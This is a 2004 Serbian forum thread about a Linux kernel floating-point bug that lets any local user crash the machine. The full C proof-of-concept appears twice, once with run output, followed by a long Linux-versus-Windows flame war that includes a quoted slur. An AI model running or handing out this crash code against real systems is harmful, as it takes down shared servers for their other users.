[ Ivan Dimkovic @ 14.06.2004. 21:47 ] @
Da odvojimo ovo od Win majstora teme koja je postala megaflame...

http://reviewed.homelinux.org/...-11_kernel_crash/index.html.en

Dakle - ovo radi i u user i root modu, dakle i remote shell acc je dovoljan da skrka pingvina:

Code:

 #include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
  
  static void Handler(int ignore)
  {
   char fpubuf[108];
   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }
  
  int main(int argc, char *argv[])
  {
   struct itimerval spec;
   signal(SIGALRM, Handler);
   spec.it_interval.tv_sec=0;
   spec.it_interval.tv_usec=100;
   spec.it_value.tv_sec=0;
   spec.it_value.tv_usec=100;
   setitimer(ITIMER_REAL, &spec, NULL);
   while(1)
    write(1, ".", 1);
  
   return 0;
  }


Impresivno :)

Citat:

* Linux 2.6.x
o 2.6.7-rc2
o 2.6.6 (vanilla)
o 2.6.6-rc1 SMP (varified by blaise)
o 2.6.6 SMP (verified by riven)
o 2.6.5-gentoo (verified by RatiX)
o 2.6.5-mm6 - (verified by Mariux)
o 2.6.5 (fedora core 2 vanilla)
o 2.6.3-13mdk (Mandrake)
* Linux 2.4.2x
o 2.4.26 vanilla
o 2.4.26, grsecurity 2.0 config
o 2.4.26-rc1 vanilla
o 2.4.26-gentoo-r1
o 2.4.22
o 2.4.22-1.2188 Fedora FC1 Kernel
o 2.4.20 RH7.3 (gcc 2.96)
o 2.4.18-bf2.4 (debian woody vanilla)

Even grsecurity-patched kernels crash. "I would have hoped that grsec would have blocked or logged something, but nothing appeared in the logs." Vincent
[ caboom @ 14.06.2004. 21:49 ] @
bogami... zakucava ki zeca.
[ caiser @ 14.06.2004. 21:51 ] @
A tacno je i ovo za logove mamu mu...
[ Dragi Tata @ 14.06.2004. 22:03 ] @
Sreća te praktično niko ne koristi Linux, tako da ovaj sigurnosni propust neće izazvati nikakvu pometnju. O "Blasteru" i sličnim pojavama su brujale novinske agencije danima - ovo niko neće ni da primeti.
[ caboom @ 14.06.2004. 22:04 ] @
sta i da uloguje kada ga zapuni ki zeku, srecom u pitanju je lokalni eksploNJt, ali je po npr. web servere veoma nezgodno sto i obican korisnik moze ovako lepo da napuni kernel.
[ Reljam @ 14.06.2004. 22:12 ] @
Citat:
Dragi Tata:Sreća te praktično niko ne koristi Linux, tako da ovaj sigurnosni propust neće izazvati nikakvu pometnju. O "Blasteru" i sličnim pojavama su brujale novinske agencije danima - ovo niko neće ni da primeti.
Da, ovo je dobar primer 'security through obscurity' bezbednosnog modela na Linuxu: jeste da postoji rupa, ali ima suvise malo korisnika tako da ne moze da se dodje do kriticne mase za neki Blaster.
[ caiser @ 14.06.2004. 22:44 ] @
Citat:
caboom:sta i da uloguje kada ga zapuni ki zeku, srecom u pitanju je lokalni eksploNJt, ali je po npr. web servere veoma nezgodno sto i obican korisnik moze ovako lepo da napuni kernel.


Pa bas zato. :) Mogao bi da se napenali bezobrazni korisnik. :)
[ caboom @ 14.06.2004. 23:07 ] @
pa to jes', ali s' obzirom na specificnost ovog koda latencija do potpunog blokiranja je veoma mala.
[ Ivan Dimkovic @ 14.06.2004. 23:19 ] @
Kako bre sad ovo - zar nisu rekli da je Linux bezbedan i da ne moze da se srusi?

A kamo ono o user/root razdvajanju i obezbedjivanju sistema :)

[ jc denton @ 14.06.2004. 23:33 ] @
Ma zavera protiv Linuxa bre.
[ VRider @ 15.06.2004. 03:09 ] @
E, sabani...
Mozete da me povucete za ... bug...
Code:

[damir@phoenix temp]$ cat test.c
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);

return 0;
}
[damir@phoenix temp]$ gcc -o test test.c
[damir@phoenix temp]$ ./test
.................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
.................................................*...............
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..*Floating point exception
[damir@phoenix temp]$

Jos samo da mi objasnite kako bi to iskoristili cak i da radi kod mene? Da nemate mozda shell nalog?
[ caiser @ 15.06.2004. 06:50 ] @
Sto ce reci, VRider je vec patchovao kernel. :))))
[ popeye @ 15.06.2004. 08:48 ] @
Gentoo distribucija je imala više verzija jezgra 2.4.25 i 2.4.26 koje nisu ni bile ranjive...
[ caiser @ 15.06.2004. 09:25 ] @
Citat:
Dragi Tata:Sreća te praktično niko ne koristi Linux, tako da ovaj sigurnosni propust neće izazvati nikakvu pometnju. O "Blasteru" i sličnim pojavama su brujale novinske agencije danima - ovo niko neće ni da primeti.


Hehehehe, tek sam sad primetio ovaj komentar. :) Ovde postoji ogromna razlika izmedju ovog bug-a i Blastera (i vecine crva za windows). Dok se Blaster (i vecina crva za windows :) siri sama, za exploatisanje ovog bug-a moras imati direktan pristup kompu i ne moze se izvrsiti njegova automatizacija. :)
[ popeye @ 15.06.2004. 10:36 ] @
I ne radi se o podizanju privilegija, već o obaranju sistema.
[ caiser @ 15.06.2004. 11:44 ] @
Sto znaci da je bug totalno bezazlen. :o)
[ popeye @ 15.06.2004. 12:34 ] @
Još malo, pa bi bio feature. :P

Šalu na stranu, ozbiljan propust je u pitanju, ali ako ne postoji način da se preuzmu administratorske privilegije - nije pogodan za virus poput Blastera. Jedino možda za bosanski virus. :)
[ Gojko Vujovic @ 15.06.2004. 12:53 ] @
Ne može da se poredi ovakav propust i Blaster worm.

Ja ne volim kad se linux "gurui" kunu u neprobojnost njihovog miljenika, ali mi još više smeta cinizam windowsaša. :) Kao prvo bilo je još 50 verzija wormova koji su harali windowsom i pre i posle tog blastera. I svaki je prouzrokovao enormnu štetu (novčanu), ako ništa onda zbog downtimea računara koji su bili inficirani. A blaster je pogađao gotovo svaku windows mašinu povezanu na net. Da bi se ovo aktiviralo na linuxu potrebno je imati i shell pristup. To se retko daje neproverenim osobama, kao što ni vi gospodo ne dajete remote desktop access ljudima kojima ne možete da verujete ili kojima ne možete da uđete u trag ukoliko naprave neku glupost. Oni malobrojni shell account serveri će biti patchovani i kraj priče. Eto zašto će ovo proći sa mnogo manje pažnje u javnosti.
[ VRider @ 15.06.2004. 13:30 ] @
Citat:
caiser:Sto ce reci, VRider je vec patchovao kernel. )))

Pa jel' VRider guru, ili nije?
[ degojs @ 15.06.2004. 13:41 ] @
Međutim na Windowsu imaš pojavu da ako samo 0.1% mašina nije zakrpljeno, to je ogroman broj - sasvim dovoljan da izazove veće probleme. Koliko je 0.1% Linux mašina? Nije baš mnogo, zar ne? Ako Win koristi 600M korisnika, 0.1% je 600,000. Mnogo je Gojko.. a daleko od toga da je na Windowsu samo 0.1% onih koji ne vode mnogo računa o ovim stvarima. Kamo sreće.
[ caiser @ 15.06.2004. 13:45 ] @
Citat:
VRider:Pa jel' VRider guru, ili nije? :)


Pa sad, ne znam. Da li si namestio winmodem? ;)))))
[ caboom @ 15.06.2004. 13:52 ] @
uau, patch-foo ... hehehe
[ srki @ 15.06.2004. 14:55 ] @
Izgleda da bug deluje:

Citat:
www.zone-h.org :
165 single IP
1472 mass defacements
Linux (95.1%)
Win 2000 (2.7%)
Unknown (1.0%)
FreeBSD (1.0%)
SolarisSunOS (0.1%)
Win NT9x (0.1%)
MacOSX (0.1%)
... (0.0%)
[ VRider @ 15.06.2004. 15:00 ] @
@caiser: VRider uspesno namesta nekoliko sorti winmodema. Nema tu, brate, kao sada ovo-ono, razumes me, sta ja znam, nego radi bre brate...
[ caiser @ 15.06.2004. 15:06 ] @
Citat:
srki:Izgleda da bug deluje:


Kakve veze ima ovaj bug sa defacementima? :) Ovi silni procenti su rezultat nekih drugih bugova. :)
[ Dragi Tata @ 15.06.2004. 15:09 ] @
Citat:
srki:Izgleda da bug deluje:


Hehehe, ne verujem da je to taj bug, ali Linux je konačno doživeo da ima 90+ procenata tržišta - makar kad su u pitanju defacementi.
[ VRider @ 15.06.2004. 15:19 ] @
Mozda je bolje, svojstveno trulom kapitalistickom zapadu, da umesto sto prikazujete defacemente po broju kompova, to radite po pricinjenoj steti. Nadjite linux bug koji je napravio milijardu dolara stete.
[ caiser @ 15.06.2004. 15:24 ] @
Citat:
VRider:@caiser: VRider uspesno namesta nekoliko sorti winmodema. Nema tu, brate, kao sada ovo-ono, razumes me, sta ja znam, nego radi bre brate... :)


Eeeeee, ako je to slucaj onda si definitivno guru. :) Kako kaze Jevandjelje po RMS-u psalm 98-101 "Thou that bestows the works of a winmodem shall go by the name of guru." :)))))
[ caiser @ 15.06.2004. 15:26 ] @
Citat:
Dragi Tata:Linux je konačno doživeo da ima 90+ procenata tržišta - makar kad su u pitanju defacementi.


Bolje ista nego nista, zar ne? :)
[ zi:: @ 15.06.2004. 15:27 ] @
well,

ne može se baš uporediti linux exploit i windows exploit samo iz jednog razloga što za linux imate source kod ...

možete zamisliti šta bi se desilo kada bi hackeri imali source kod od windowsa? strašno. spretniji čitaju kod kao ljubavni roman, i samo kažu, aha: tu je exploit, ljubavi moja. udri.

imao samo par puta prilike isprobati remote exploit od linuxa, bilo za denial of service attack, bilo za remote shell pristup ... ali bilo je to još u vreme kada su ljudi imali poverenja, pa nisu zabranjivali čak ni finger service, telnet da i ne pominjem ::

sada se mnogo ređe povaljvuju remote exploiti, a i svako ko ima snagu može sa DoS attackom srušiti bilo koji računar. Iole ozbiljniji računar na bilo kojem univerzitetu u americi ima veći bandwith nego čitava Srbija.

[ popeye @ 15.06.2004. 15:28 ] @
Što je najgore, izgleda da je obuhvatio i neke druge platforme:
Citat:

http://www.trendmicro.com/map/

Infected computers in past 24 hours:

1. WORM_NETSKY.P 7,698
2. HTML_NETSKY.P 5,933
3. PE_ZAFI.B 4,675
4. WORM_NETSKY.D 2,574
5. WORM_NETSKY.Z 2,549
6. WORM_NETSKY.B 1,584
7. WORM_NETSKY.Q 1,506
8. JAVA_BYTEVER.A 1,427
9. WORM_NETSKY.DAM 1,150
10. WORM_NETSKY.C 1,094
[ srki @ 15.06.2004. 15:29 ] @
Ali za windows postoji source kod. Mozes ga naci na kazaa. Hakeri koje to zanima vec imaju source.
[ Dragi Tata @ 15.06.2004. 15:35 ] @
Čekaj malo! Prvo mi tu prodajete neke teorije kako je open-source software sigurniji jer "milioni programera" (hahaha) po ceo dan bulje u kod (hahahaha) i šalju patcheve (haaaaaahahahhaha), a sad stiže neko opravdanje da je Linux ranjiv jer je open source i da bi Win bio još ranjiviji kad bi bio otvoren.

Hajde, odlučite se već jednom...
[ -zombie- @ 15.06.2004. 15:39 ] @
Citat:
Dragi Tata:
Hehehe, ne verujem da je to taj bug, ali Linux je konačno doživeo da ima 90+ procenata tržišta - makar kad su u pitanju defacementi.


pa sad, ako bi se rukovodio vašim razmišljanjem: pa bilo bi toliko difejsa i na windows serverima kada bi bilo koliko i linuxa..

:-P
[ VRider @ 15.06.2004. 15:43 ] @
zi:: malo unosi drugaciji pogled u linux tabor, koji je inace kompaktan.
Da je linux ranjiv kao i windows (ili vise, sto pokusavate da pokazete onim beslislenim podacima) na kraju godine bi bio i po neki linux exploit na listi top 10 stetocina. Ovako, na celoj listi windows gluposti u ukupnoj vrednosti od 20-30 milijardi dolara. Iz mog dzepa ni dolar...
[ caiser @ 15.06.2004. 15:44 ] @
Citat:
Dragi Tata:"milioni programera" (hahaha) po ceo dan bulje u kod (hahahaha) i šalju patcheve (haaaaaahahahhaha)


Pa sta tu nije tacno. :) Patch je izasao zajedno sa bugom. :) Tj. bug je izasao sa patchom. :)
[ Dragi Tata @ 15.06.2004. 15:48 ] @
Citat:
VRider:zi:: malo unosi drugaciji pogled u linux tabor, koji je inace kompaktan.
Da je linux ranjiv kao i windows (ili vise, sto pokusavate da pokazete onim beslislenim podacima) na kraju godine bi bio i po neki linux exploit na listi top 10 stetocina. Ovako, na celoj listi windows gluposti u ukupnoj vrednosti od 20-30 milijardi dolara. Iz mog dzepa ni dolar... :)


To je zato što niko ne koristi Linux za poslovne svrhe. Kolika je šteta kad se defacuje sajt FSF-a? 0$. Da sam ciničan kao što nisam, rekao bih čak i da je šteta negativna, tj da su takvi defacementi korisni.
[ zi:: @ 15.06.2004. 15:54 ] @
pa nisam ja rekao da je linux ranjiviji nego windows, nego sam se samo pitao sta bi bilo kada bi windows source kod bio otvoren. pazi: nije to nikakav izgovor za ovaj inace neinteresantan exploit posto trebas imati previse prava (shell pristup nije sala) da bi ga iskoristio, a i kasnije se vidi ko je to uradio po logovima, nego su mi interesantni ovi sto sretno koriste windows i likuju nad ovom gluposcu.

nisam bas pristalica bilo kakvih tabora, makar linux iskljucivo koristim od 1997-e (a pre toga sam uglavnom koristio HP Unix). doduse, nekada skrenem u Mac OS X vode, ali to je isto Unix, pa ...

[ Dragi Tata @ 15.06.2004. 15:58 ] @
Citat:
zi:::pa nisam ja rekao da je linux ranjiviji nego windows, nego sam se samo pitao sta bi bilo kada bi windows source kod bio otvoren.


Onda bi milijarde programera po ceo dan buljile u Windows source i slale patcheve MS-u. Ili možda to ne funkcioniše baš tako?
[ Dejan Lozanovic @ 15.06.2004. 16:04 ] @
Citat:
Dragi Tata
Sreća te praktično niko ne koristi Linux, tako da ovajsigurnosni propust neće izazvati nikakvu pometnju. O "Blasteru" i sličnim pojavama su brujale novinske agencije danima - ovo niko neće ni da primeti.


Preterano lupetas, pre svega ne radi se o sigurnosnom propustu nego o Denial-of-Service DOS-u. Ti sebe izdajes kao programera ovde pa prema tome valjda si u stanju da pogledas 10 linija koda pa da kazes sta radi. Ali eto za tebe i sve ostale neupucene koji toliko likuju samo da kazem da ovaj program uradi 100% zauzece jednog procesora, jer se zavrti Handler funkciji(manje vise svako ko je programirao neki mikrokontroler zna o cemu pricam)

Samo da neko ne pomisli da iz svih peta branim linux, ovo jeste bug i to ozbiljan, ali ovakvo laprdanje "Mesije" poslednjih mesec dana je nepodnosljivo gde ljude karakterise kao "novi pacijent" i "slobodarske fanatike".
[ VRider @ 15.06.2004. 16:06 ] @
Citat:
To je zato što niko ne koristi Linux za poslovne svrhe.

Cale, ne lupaj... Da si rekao "ne koriste mnogi" pa i 'ajde, ali ovako, moracu da te ubrojim u punopravne vernike koji se mole Billu pred spavanje.

Citat:
Onda bi milijarde programera po ceo dan buljile u Windows source i slale patcheve MS-u.

Upravo. A razlika od objavljanog exploita do primenjenog patcha bi znacila par milijardi dolara stete.
[ zi:: @ 15.06.2004. 16:07 ] @
Citat:
Dragi Tata:To je zato što niko ne koristi Linux za poslovne svrhe.


imam srecu ili nesrecu da ucestvujem u projektu odrzavanja vise desetina masina sirom evrope (sve linux, pokoji freebsd), i gle cuda, vlasnici tih masina baziraju svoj posao na tim serverima. da li se onda linux koristi u poslovne svrhe? pretpostavljam da je to onda njihov hobi, a dobre zarade koje iz toga proizilaze cista slucajnost. naravno, te bi zarade bile 20 puta vece da se koristi microsoft. minimum.

jesu open source warriori fasisti, priznajem, ali jos gori fasisti od njih su protivnici open sourca.

da se razumemo, ja duboko cenim windows, i stvarno nemam nista protiv njega, XP bas sexy izgleda, samo ga ne koristim, valjda iz navike.
[ Dejan Lozanovic @ 15.06.2004. 16:10 ] @
Citat:
zi:::pa nisam ja rekao da je linux ranjiviji nego windows, nego sam se samo pitao sta bi bilo kada bi windows source kod bio otvoren. pazi: nije to nikakav izgovor za ovaj inace neinteresantan exploit posto trebas imati previse prava (shell pristup nije sala) da bi ga iskoristio, a i kasnije se vidi ko je to uradio po logovima, nego su mi interesantni ovi sto sretno koriste windows i likuju nad ovom gluposcu.


Pa ako si pogledao bug je pronadjen slucajno conek koji ga je pronasao mislio je da je bug u gcc-u, covek nije gledao kernel :) pa tamo to provalio :)
[ VRider @ 15.06.2004. 16:11 ] @
Citat:
...da ovaj program uradi 100% zauzece jednog procesora...

Hoces Deki da kazes da ovo ne bi ni uticalo na viseprocesorski sistem?
[ Dragi Tata @ 15.06.2004. 16:13 ] @
Dobro, možda je trebalo reći "niko ozbiljan" ne koristi Linux u poslovne svrhe, ali konstatacija stoji da od tih silnih defacementa ima malo štete jer ko god ima para kupiće nešto ozbiljno (Solaris, Windows, AIX...) a neće da koristi šupalj software kao što je Linux.
[ srki @ 15.06.2004. 16:15 ] @
Citat:
VRider:Upravo. A razlika od objavljanog exploita do primenjenog patcha bi znacila par milijardi dolara stete. :)

VRider, to uopste nije tacno. Recimo udate koji ispravlja gresku u NT kernelu koju koristi blaster je napravljen mnogo pre pojave blastera ali se balster rasirio zahvaljujuci korisnicima koji nikada ne rade update. Znaci kada je veliki broj korisnika u pitanju onda to sto se patch pojavi na vreme nema nikakve veze.
[ VRider @ 15.06.2004. 16:17 ] @
Citat:

Linux u 1200 nemačkih McDonald's restorana
----------------------------------------------------------------------
Kompanija McDonald's ima 1200 restorana u Nemačkoj i odnedavno za poslovanje
koristi SUSE Linux Enterprise Server za DNS, FTP i zastupničke usluge na
Internetu.

Prema rečima zvaničnika ove multinacionalne kompanije, Linux je odlično
rešenje jer je jeftin, stabilan i može se proširivati.

Upotreba Linuxa u poslovne svrhe sve višem raste, a ostaje da se vidi da li
će ga McDonald's uvesti i u ostatak svojih restorana širom sveta. (V.K.)

Ovo su danasnje Mikro vesti.
[ Dragi Tata @ 15.06.2004. 16:19 ] @
Odlična vest. McDonald's će da propadne jer koristi loš software, pa će deca zdravije da se hrane...
[ VRider @ 15.06.2004. 16:21 ] @
Citat:
VRider, to uopste nije tacno...

I te kako je tacno. Ne govorim o steti tog tipa kakvu je pravio Blaster. Ako bi se otkrio nov propust u windowsu i treba da prodje par sati (dana) do izlaska patcha, sta ce vasih cuvenih top_50_fortune_companies_ovo_ono da radi za to vreme?
[ Dragi Tata @ 15.06.2004. 16:21 ] @
E, jbga. Kolega kog sam čekao je završio specifikaciju, pa sad nemam više izgovor da ne radim. Ćao Linuxovci, bilo je zadovoljstvo provocirati vas - palite se lako kao i uvek, hehehehe....
[ VRider @ 15.06.2004. 16:23 ] @
Nakon sto pokazete svoju punu verbalnu nemoc i neobavestenost, palite kao i uvek...
Dovidjenja, dragi cale...
[ degojs @ 15.06.2004. 16:24 ] @
Junk Food - Junk OS. Šta više reći :)
[ zi:: @ 15.06.2004. 16:31 ] @
Citat:
Dragi Tata:Dobro, možda je trebalo reći "niko ozbiljan" ne koristi Linux u poslovne svrhe, ali konstatacija stoji da od tih silnih defacementa ima malo štete jer ko god ima para kupiće nešto ozbiljno (Solaris, Windows, AIX...) a neće da koristi šupalj software kao što je Linux.


ok, verujem, potpuno si u pravu. pobedio si. vidimo se kod sledeceg windows reboota.

btw, bas sam bio u kragujevcu pre koji dan, dan je bio divan, a ljudi bas nasmejani.

btw2, mcdonalds je zatvoren u kragujevcu. njima ni linux nije trebao da bankrotiraju ::

dakle, no hard feelings, sve ok, bila je lepa diskusija.

[ Ivan Dimkovic @ 15.06.2004. 16:31 ] @
Pa cekaj VRider.. pronadjen je Linux xploit a ne Win xploit... Blaster je yesterday's news... sto sad odjednom takav stav..

Kernel developeri treba malo da se pokriju usima, zakrpe krnl i to je to... mit o stabilnosti Linuxa je malo narusen, al' sta da se radi :)

Citat:

ok, verujem, potpuno si u pravu. pobedio si. vidimo se kod sledeceg windows reboota.


Btw, cini mi se da ja ipak redje rebootujem XP na ovih 5 masina na gajbi nego sto vi rekompajlirate kernel :-)
[ srki @ 15.06.2004. 16:39 ] @
Citat:
VRider:I te kako je tacno. Ne govorim o steti tog tipa kakvu je pravio Blaster. Ako bi se otkrio nov propust u windowsu i treba da prodje par sati (dana) do izlaska patcha, sta ce vasih cuvenih top_50_fortune_companies_ovo_ono da radi za to vreme?

A za linuks bi se odmah nasao neko od miliona programera da ispravi bug. To se i vidi po procentu difejsovanih masina. Tako da i dalje ostaje da to sto si rekao nije tacno. Najvecu stetu prave worms koji iskoriscavaju rupe koju su odavno zakrpljene ali je dovoljno da 1% korisnika ne radi update i to je vec 6 miliona korisnika. Mada broj njih koji radi update je i manji. A sto se tice stete koje ne rade blasteri, tu se vidi da najvise stradaju linux masine.
[ zi:: @ 15.06.2004. 16:51 ] @
Citat:
Ivan Dimkovic:Btw, cini mi se da ja ipak redje rebootujem XP na ovih 5 masina na gajbi nego sto vi rekompajlirate kernel :-)


ovo je super pitanje. jeste da se udaljavamo od teme, ali ne mogu da izdrzim. siguran sam da je windows, nezaprljan sa milion programa stabilan, i da dugo moze da radi. ali pitanje je koliko dugo?

vec sam prestao da proveravam uptime, ali evo, cisto da vidite:

masina u londonu, freebsd:
up 208 days (web server za e-commerce)
masina u budimpesti, linux:
up 196 days (sms gateway, adserver)
druga masina u budimpesti, linux:
up 112 days (salje 500.000 mailova na dan)
treca masina u budimpesti, linux:
up 418 days (!!) (isporucuje 2 miliona bannera dnevno)
masina u subotici, linux:
up 152 days (webserver, proxyserer, fileserver)
laptop, powerbook, mac os X
up 124 days

a svi ovi prekidi su izazivani samo dislokacijom servera ili gadnijim prekidom struje.

sada cete reci da sam ove brojke mogao izmisliti, ali zasto bih? stvarno je tako, i stvarno me interesuju tudja iskustva.

ne mora bas svaki dan da se rekompajlira kernel.
[ popeye @ 15.06.2004. 17:49 ] @
Pretpostavljam da su onih 418 dana ostvareni na jezgru 2.2 ili 2.0 serije.
[ Dragi Tata @ 15.06.2004. 17:49 ] @
Citat:
VRider:Nakon sto pokazete svoju punu verbalnu nemoc i neobavestenost, palite kao i uvek... :)


Dobro je dok smo samo verbalno nemoćni ;)
[ axez @ 15.06.2004. 17:57 ] @
zi:: da nisi ti novi ovde....:)

Dzabe svi ti uptimeovi i sto ne moras da rebootujes, i sto nemas virusa, sto nemas spyware-a, sto nisi prikovan za jednog pateticnog dobavljaca softvera, sto ne podlezes ucenama da iznajmljujes taj jedan_te_isti_softver_samo_drugacije_zapakovan svakih par godina, sto nisi primoran da te OS tretira kao debila a kompanija koja ga je proizvela za jos veceg.

Dzabe sve to kad na linuxu nema da kliknes desnim tasterom i zipujes sve te dokumente koji su nekompatibilni sa starijim verzijama tog istog softvera kojeg si prinudjen da kupujes iznova i iznova i iznova...;)

Windoza Rulez, Lindza suckz, Bily G je bog i ja zelim da budem bogat kao on i zato cu ga ljubiti u cmar a posle Stiva B u celu.


[disclaimer] Nadam se da niste pomislili da se mozda divim tom ljigavom stvorenju koje je tako fino upropastilo racunarski svet i nafilovalo ga svojim smecem koje vam prodaje iznova i iznova i iznova...;)
Navika je cudna stvar, vecina ljudi ce radije pristati da izgledaju i da ih tretiraju kao morone nego sto ce se potruditi da nauce nesto novo pa makar to bilo i za njihovu korist.
[ degojs @ 15.06.2004. 18:07 ] @
Auuu..
axez, da nisi ti novi ovde? :D

[ neetzach @ 15.06.2004. 18:18 ] @
Citat:
axez

Dzabe sve to kad na linuxu nema da kliknes desnim tasterom i zipujes sve te dokumente koji su nekompatibilni sa starijim verzijama tog istog softvera kojeg si prinudjen da kupujes iznova i iznova i iznova...;)



Uh, bolje nemoj to da potezes jer je i sam Linux nekompatibilan, ne samo izmedju razlicitih disitribucija, vec i izmedju verzija razlicite distribucije.
[ srki @ 15.06.2004. 18:28 ] @
http://www.unixsucks.com/
[ weB_KiLeR @ 15.06.2004. 18:34 ] @
@axez:
To neki ovaj rad :)
MAN I CAN"T BELIEVE YOU HATE UNIX!!!!!!!!!! YOU ARE A FAGGOT AND YOU WILL DIE! I AM A L33T Hax0rs AND I WILL DESTOY YOUR SYSTEM! BE WARNED LINUX RULEZZZ! I BET YOU HATE RICED OUT CARZ TOO....LOOOOOOOZER
[ Dragi Tata @ 15.06.2004. 18:57 ] @


Čovek je genije. Baci kosku budalama, pa se posle smeje i beleži rast posećenosti sajta...
[ Dragi Tata @ 15.06.2004. 19:18 ] @
Srki, gde si našao onaj sajt? Suvo blago, nema šta. Prepun korisnih informacija za nerviranje Linuxovaca. Da li da stavim link u potpis, hehehe?
[ srki @ 15.06.2004. 19:26 ] @
Dobra ideja :) Sajt sam nasao preko googla, trazio sam dobar materijal za nerviranje linuksovaca.
[ degojs @ 15.06.2004. 19:40 ] @
srrki bre, pa ti si u poslednje vreme postao pravi velemajstor za pljuvanje GNU\Linux-a :)
Jeste da ovi svaki čas postižu autogolove, ali dobro je i ovo tvoje zakucavanje u poslednje vreme :)
[ popeye @ 15.06.2004. 20:45 ] @
Kad ste već tu, pogledajte i izaberite:

http://www.google.com/search?h...0%B2%D0%B0%D1%9A%D0%B5&lr=
[ caiser @ 15.06.2004. 22:15 ] @
I mi konja za trku im[dugo a ala miroljub labus]o. :)

http://www.windows-sucks.com/

or

http://dmoz.org/Society/Issues...ies_and_Oligopolies/Microsoft/

or

http://www.ntsucks.com/

or

http://www.msboycott.com/super/

uf... ja ne mogu vise... neka neko nastavi pliz. :)
[ axez @ 15.06.2004. 22:38 ] @
E, znam ja najbolji sajt...:)

http://www.euronet.nl/users/frankvw/rants/microsoft/IhateMS.html
[ VRider @ 16.06.2004. 00:21 ] @
Citat:
A za linuks bi se odmah nasao neko od miliona programera da ispravi bug. To se i vidi po procentu difejsovanih masina. Tako da i dalje ostaje da to sto si rekao nije tacno. Najvecu stetu prave worms koji iskoriscavaju rupe koju su odavno zakrpljene ali je dovoljno da 1% korisnika ne radi update i to je vec 6 miliona korisnika. Mada broj njih koji radi update je i manji. A sto se tice stete koje ne rade blasteri, tu se vidi da najvise stradaju linux masine.

Srki, Srki... Mani se statistike. Pare. Koliko godisnju stetu pretrpi svetska industrija zbog linux exploita, a koliku zbog windows sranja? Dolari. Znas, pare, novac...
[ srki @ 16.06.2004. 00:52 ] @
Koliku? Rekao si da ne racunas Blaster i tako te stvari. Zato mislim da je veca steta od pada linux servera jer vise linux servera strada. Nekada je bilo drugacije ali trenutno nije.
[ VRider @ 16.06.2004. 01:28 ] @
Srki, da razdvojimo dve stvari:
Prva. Blaster se ne racuna. To se odnosilo na (zamisljenu) sitaciju da MS otvori kod Windowsa. Odjednom bi more programera pocelo da precesljava kod, neki sa dobrim namerama (objavljivanje patcha), neki sa losim namerama (zloupotreba propusta). Kako bi umesto 5k ljudi taj kod odjednom gledalo milion ljudi, moglo bi se ocekivati da broj otkrivenih propusta naglo naraste. Ako to ne bude pratila pojava patcheva (a zasto bi, kad su ljudi koji rade sa MS proizvodima naviknuti da sve ima svoju cenu, pa verovatno bas ni nece potrcati da dele svoj trud za DZ) pojavice se vakuum od par sati, dana, nedelja, kada ce se veliki korisnici windowsa naci na milost i nemilost zlonamernim posetiocima, ili ce moci samo da iskljuce svoje servera (koja je poenta servera od milion $ koji ne radi?). Kada je linux u pitanju, to ce se teze desiti, jer je kod otvoren od samog starta, i od samog starta ga precesljava mnogo ljudi. Propusti koji se nadju se objvljuju brze-bolje sa sve patchom, jer se na taj nacin (u glavama tih koji se time bave - i ja mislim da je tuzno) brani svetinja, a sebi se pribavlja titula poznavaoca (gurua).
Druga. Blaster (i kompanija) se racuna. Pogledaj koliku su stetu pretrpeli korisnici windows sistema u prosloj godini od svega i svacega, a koliku linux korisnici (ako uopste nadjes podatak - niko ne radi sa tolikom sicom ). Kako je linux korisnika svega 2% a windows korisnika 96-97%, slobodno pomnozi linux stetu sa 50.

Sada "cuveni" propust. On ne omogucuje nista drugo osim zakucavanja servera na kome zlonamerni korisnik ima shell pristup. Shell pristup nema svako. Mali milion linux servera nema mogucnost za remote pristup (ugaseni telnetd i sshd, ogranicen pristup samo iz odgovarajuceg ip opsega...). Resenje je patchovanje kernela (manje od pola sata posla). Cak mislim da je moguce onesposobiti ovu vrstu napada (spreciti 100% zauzece procesora od strane jednog korisnika), ali nisam siguran. Moracu da konsultujem odredjenu literaturu.

P.S. Sajtovi su zesce jadni. Da ne poverujes kakvih sve pacenika ima na ovom svetu. Ali, dobro...
[ srki @ 16.06.2004. 02:20 ] @
Damire, u vezi sa te dve stvari:

Prva: To su pricali i za Windows 2000 i kada je procureo kod sta je bilo? Nista. Jedan sitan exploit koji je odmah zakrpljen. Iako ima dosta servera pod Windowsom 2000 nije se nista desilo. Onoga koga zanima da trazi explot on ce lako nabaviti kod jer ga ima na mali milion mesta na internetu. Tako da uopste nije tacno to sto pricas.

Druga: Tu si u pravu da blaster i wormsi cine najvise stete ali to je zbog rasprostranjenosti Windowsa. Dovoljno je 1% korisnika da ne skine patch za kernel i eto belaja, 6-8 miliona zarazenih racunara. Zato kazem da su tu najvise korisnici krivi. Da je linux tako rasprostranjen mislis da ne bi bilo barem 1% korisnika koji bi bili stalno ulogovani kao root ili koji ne bi znali da iskljuce razne servise (BIND itd...) u kojima je bilo propusta! Za te propuste ti nije trebalo da imas shell pristup. Ali tu uopste nije kriv linux kao linux nego ljudi koji prave distribucije. Znas i sam da 99% upada u servere nije zbog operativnog sistema nego zbog losih aplikacija (za baze podataka i druge aplikacije) a aplikacije na linuxu ne mogu da budu sigurnije. Sigurnost zavisi od ljudi koji pisu te aplikacije.
[ VRider @ 16.06.2004. 12:06 ] @
Kod koji je procurio je star 3-4 godine, a ni ovi u MSu nisu u dupe prav'eni (lokalni izraz, nisam mogao da odolim ). Puno toga je zakrpljeno kroz SPove. Upoznavanje sa par stotina MB koda trazi vreme, sto uz totalnu zastarelost istog i jeste dovelo do toga da curenje nije prouzrokovalo ozbiljnije probleme.
